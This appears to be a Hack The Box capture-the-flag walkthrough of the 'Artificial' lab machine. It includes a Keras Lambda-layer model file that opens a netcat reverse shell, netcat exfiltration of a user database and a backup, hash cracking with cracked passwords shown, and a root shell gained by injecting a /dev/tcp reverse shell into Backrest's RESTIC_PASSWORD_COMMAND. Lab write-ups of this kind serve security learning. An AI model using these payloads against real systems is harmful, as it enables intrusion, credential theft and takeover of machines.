🧑‍🎨 Artificial
https://app.hackthebox.com/machines/668

Recon
[*] Running initial Nmap scan...
sudo nmap -sCV -T4 <ip> -oA nmap-initial
[..]
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 7c:e4:8d:84:c5:de:91:3a:5a:2b:9d:34:ed:d6:99:17 (RSA)
| 256 83:46:2d:cf:73:6d:28:6f:11:d5:1d:b4:88:20:d6:7c (ECDSA)
|_ 256 e3:18:2e:3b:40:61:b4:59:87:e8:4a:29:24:0f:6a:fc (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://artificial.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

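# Build environment for producing models compatible with the target app:
# Python 3.8 + tensorflow-cpu 2.13.1, the versions the application pins.
FROM python:3.8-slim
WORKDIR /code
# Fetch the pinned wheel over *verified* TLS. The original used `curl -k`,
# which disables certificate validation and lets anyone on the path swap the
# wheel for a malicious one; --fail also stops a 4xx/5xx error page from being
# saved to disk and later "installed".
RUN apt-get update && \
    apt-get install -y --no-install-recommends curl && \
    curl --fail --proto '=https' --tlsv1.2 -LO https://files.pythonhosted.org/packages/65/ad/4e090ca3b4de53404df9d1247c8a371346737862cfe539e7516fd23149a4/tensorflow_cpu-2.13.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl && \
    rm -rf /var/lib/apt/lists/*
# TODO(review): pin the wheel's sha256 (e.g. a requirements file installed with
# `pip install --require-hashes`) so the build fails closed if the artifact is
# ever tampered with upstream. --no-cache-dir keeps the image smaller.
RUN pip install --no-cache-dir ./tensorflow_cpu-2.13.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl
ENTRYPOINT ["/bin/bash"]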
User
Arbitrary code execution via Keras Lambda-layer deserialization in the tensorflow-cpu 2.13.1 library: the Python function of a `Lambda` layer is stored inside the `.h5` model file and executed when the application loads and runs an uploaded model.
➜ /opt/python-3.10.0/bin/python3.10 -m venv venv
➜ source ./venv/bin/activate
(venv) ➜ pip install -r requirements.txt
Collecting tensorflow-cpu==2.13.1
[..]
import tensorflow as tf
import os


def exploit(x):
    """Payload layer: spawn a reverse shell, then pass the input through.

    Everything the payload needs is defined *inside* the function. Keras stores
    a Lambda's function as serialized bytecode rather than by reference, so
    module-level names (e.g. the ``os`` imported above) are not available when
    the server deserializes and executes it.

    NOTE(review): serialized bytecode is interpreter-version specific. The
    target's Dockerfile pins Python 3.8, so building the model under 3.8 is the
    safe choice; the 3.10 venv used in this run happened to work.
    """
    import os
    os.system("rm -f /tmp/f; mknod /tmp/f p; cat /tmp/f | /bin/sh -i 2>&1 | nc <ip> 1337 >/tmp/f")
    # Return the tensor unchanged so the model still yields a "prediction".
    return x


# Minimal model whose only real layer is the Lambda carrying the payload.
# The input shape is arbitrary for this purpose; the Lambda ignores its tensor.
layers = [
    tf.keras.layers.Input(shape=(64,)),
    tf.keras.layers.Lambda(exploit),
]
model = tf.keras.Sequential(layers)
model.compile()
# Legacy HDF5 format on purpose: the target accepts .h5 uploads, and this is
# the format in which the Lambda function travels with the model.
model.save("exploit.h5")
(venv) ➜ python3 exploit.py
2025-06-24 15:39:06.771071: I tensorflow/core/platform/cpu_feature_guard.cc:182] This TensorFlow binary is optimized to use available CPU instructions in performance-critical operations.
To enable the following instructions: AVX2 FMA, in other operations, rebuild TensorFlow with the appropriate compiler flags.
/mnt/e/hacking/hackthebox/Season8/artificial/venv/lib/python3.10/site-packages/keras/src/engine/training.py:3000: UserWarning: You are saving your model as an HDF5 file via `model.save()`. This file format is considered legacy. We recommend using instead the native Keras format, e.g. `model.save('my_model.keras')`.
saving_api.save_model(
Start the listener first, then upload `exploit.h5` and click "View Predictions": loading and running the model executes the Lambda payload and spawns the reverse shell.
➜ rlwrap nc -nlvp 1337
listening on [any] 1337 ...
connect to [VPN] from (UNKNOWN) [IP] 48596
/bin/sh: 0: can't access tty; job control turned off
$ whoami
app
Transferring users.db from the application's instance folder to the attacking machine (listener on the attacker, sender on the target):
➜ nc -lp 1234 > users.db
[after sending]
➜ ll users.db
-rw-r--r-- 1 kali kali 24K Jun 24 15:50 users.db
$ ls
users.db
$ nc -w 3 <ip> 1234 < users.db
1 gael gael@artificial.htb c99175974b6e192936d97224638a34f8
2 mark mark@artificial.htb 0f3d8c76530022670f1c6029eed09ccb
3 robert robert@artificial.htb b606c5f5136170f15444251665638b36
4 royer royer@artificial.htb bc25b1f80f544c0ab451c02a3dca9fc6
5 mary mary@artificial.htb bf041041e57f1aff3be7ea1abd6129d0
➜ cat hashes
c99175974b6e192936d97224638a34f8
0f3d8c76530022670f1c6029eed09ccb
b606c5f5136170f15444251665638b36
bc25b1f80f544c0ab451c02a3dca9fc6
bf041041e57f1aff3be7ea1abd6129d0
➜ hashcat --identify hashes
The following 11 hash-modes match the structure of your input hash:
# | Name | Category
======+============================================================+======================================
900 | MD4 | Raw Hash
0 | MD5 | Raw Hash
70 | md5(utf16le($pass)) | Raw Hash
2600 | md5(md5($pass)) | Raw Hash salted and/or iterated
3500 | md5(md5(md5($pass))) | Raw Hash salted and/or iterated
4400 | md5(sha1($pass)) | Raw Hash salted and/or iterated
20900 | md5(sha1($pass).md5($pass).sha1($pass)) | Raw Hash salted and/or iterated
4300 | md5(strtoupper(md5($pass))) | Raw Hash salted and/or iterated
1000 | NTLM | Operating System
9900 | Radmin2 | Operating System
8600 | Lotus Notes/Domino 5 | Enterprise Application Software (EAS)
➜ hashcat -m 0 -a 0 hashes /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
[...]
c99175974b6e192936d97224638a34f8:mattp005numbertwo
➜ ssh gael@artificial.htb
gael@artificial.htb's password: mattp005numbertwo
Warning: No xauth data; using fake authentication data for X11 forwarding.
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-216-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Tue 24 Jun 2025 01:55:57 PM UTC
System load: 0.11 Processes: 252
Usage of /: 63.6% of 7.53GB Users logged in: 1
Memory usage: 36% IPv4 address for eth0: ip
Swap usage: 0%
Expanded Security Maintenance for Infrastructure is not enabled.
0 updates can be applied immediately.
Enable ESM Infra to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
/usr/bin/xauth: file /home/gael/.Xauthority does not exist
Last login: Tue Jun 24 13:55:58 2025 from VPNIP
gael@artificial:~$ ls
user.txt
Root
gael@artificial:~$ netstat -tlpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:5000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:9898 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:6010 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 ::1:6010 :::* LISTEN -
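# Run on the target as gael: list every active service together with the unit
# file it was loaded from. Units living under /etc/systemd/system (rather than
# the distro's /lib/systemd/system) are typically locally added and worth
# reading for custom binaries, hard-coded ports and credentials.
systemctl list-units --type=service --state=active --no-legend \
  | awk '{print $1}' \
  | while read -r svc; do
      # -r keeps read from interpreting backslashes; quote "$svc" so unusual
      # unit names are passed through intact.
      path=$(systemctl show -p FragmentPath --value "$svc")
      printf '%-50s %s\n' "$svc" "$path"
    done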
accounts-daemon.service /lib/systemd/system/accounts-daemon.service
app.service /etc/systemd/system/app.service
apparmor.service /lib/systemd/system/apparmor.service
apport.service /run/systemd/generator.late/apport.service
atd.service /lib/systemd/system/atd.service
auditd.service /lib/systemd/system/auditd.service
backrest.service /etc/systemd/system/backrest.service
[..]
gael@artificial:~$ cat /etc/systemd/system/backrest.service
[Unit]
Description=Backrest Service
After=network.target
[Service]
Type=simple
User=root
Group=root
ExecStart=/usr/local/bin/backrest
Environment="BACKREST_PORT=127.0.0.1:9898"
Environment="BACKREST_CONFIG=/opt/backrest/.config/backrest/config.json"
Environment="BACKREST_DATA=/opt/backrest"
Environment="BACKREST_RESTIC_COMMAND=/opt/backrest/restic"
[Install]
WantedBy=multi-user.target
gael@artificial:~$ ll /var/backups/
total 51228
drwxr-xr-x 2 root root 4096 Jun 9 09:03 ./
drwxr-xr-x 13 root root 4096 Jun 2 07:38 ../
-rw-r--r-- 1 root root 39386 Jun 9 09:02 apt.extended_states.0
-rw-r--r-- 1 root root 4206 Jun 2 07:42 apt.extended_states.1.gz
-rw-r--r-- 1 root root 4190 May 27 13:07 apt.extended_states.2.gz
-rw-r--r-- 1 root root 4383 Oct 27 2024 apt.extended_states.3.gz
-rw-r--r-- 1 root root 4379 Oct 19 2024 apt.extended_states.4.gz
-rw-r--r-- 1 root root 4367 Oct 14 2024 apt.extended_states.5.gz
-rw-r--r-- 1 root root 4356 Sep 22 2024 apt.extended_states.6.gz
-rw-r----- 1 root sysadm 52357120 Mar 4 22:19 backrest_backup.tar.gz
➜ artificial nc -lp 1234 > backup.tar.gz
gael@artificial:~$ nc -w 3 <ip> 1234 < /var/backups/backrest_backup.tar.gz
{
"modno": 2,
"version": 4,
"instance": "Artificial",
"auth": {
"disabled": false,
"users": [
{
"name": "backrest_root",
"passwordBcrypt": "JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP"
}
]
}
}
➜ echo 'JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP' | base64 -d | tee hash
$2a$10$cVGIy9VMXQd0gM5ginCmjei2kZR/ACMMkSsspbRutYP58EBZz/0QO%
➜ backrest hashcat --identify hash
The following 4 hash-modes match the structure of your input hash:
# | Name | Category
======+============================================================+======================================
3200 | bcrypt $2*$, Blowfish (Unix) | Operating System
25600 | bcrypt(md5($pass)) / bcryptmd5 | Forums, CMS, E-Commerce
25800 | bcrypt(sha1($pass)) / bcryptsha1 | Forums, CMS, E-Commerce
28400 | bcrypt(sha512($pass)) / bcryptsha512 | Forums, CMS, E-Commerce
➜ hashcat -a 0 -m 3200 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
$2a$10$cVGIy9VMXQd0gM5ginCmjei2kZR/ACMMkSsspbRutYP58EBZz/0QO:!@#$%^
➜ backrest ssh -L9898:127.0.0.1:9898 gael@artificial.htb
gael@artificial.htb's password: mattp005numbertwo
Warning: No xauth data; using fake authentication data for X11 forwarding.
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-216-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Tue 24 Jun 2025 02:22:39 PM UTC
System load: 0.11 Processes: 269
Usage of /: 59.0% of 7.53GB Users logged in: 2
Memory usage: 34% IPv4 address for eth0: IP
Swap usage: 0%
Expanded Security Maintenance for Infrastructure is not enabled.
0 updates can be applied immediately.
Enable ESM Infra to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Jun 24 14:22:40 2025 from VPN
gael@artificial:~$

Creating a new repository through the Backrest web UI (reached via the tunnel at http://127.0.0.1:9898, logging in as backrest_root with the recovered password) and adding the environment variable below to the repository. The unit file runs backrest as root (User=root), so whatever restic executes via RESTIC_PASSWORD_COMMAND also runs as root:
RESTIC_PASSWORD_COMMAND=bash -c 'bash -i >& /dev/tcp/<ip>/1338 0>&1'

➜ sorcery rlwrap nc -nlvp 1338
listening on [any] 1338 ...
[after submitting repo]
connect to [VPN] from (UNKNOWN) [IP] 53282
bash: cannot set terminal process group (41424): Inappropriate ioctl for device
bash: no job control in this shell
root@artificial:/# whoami
whoami
root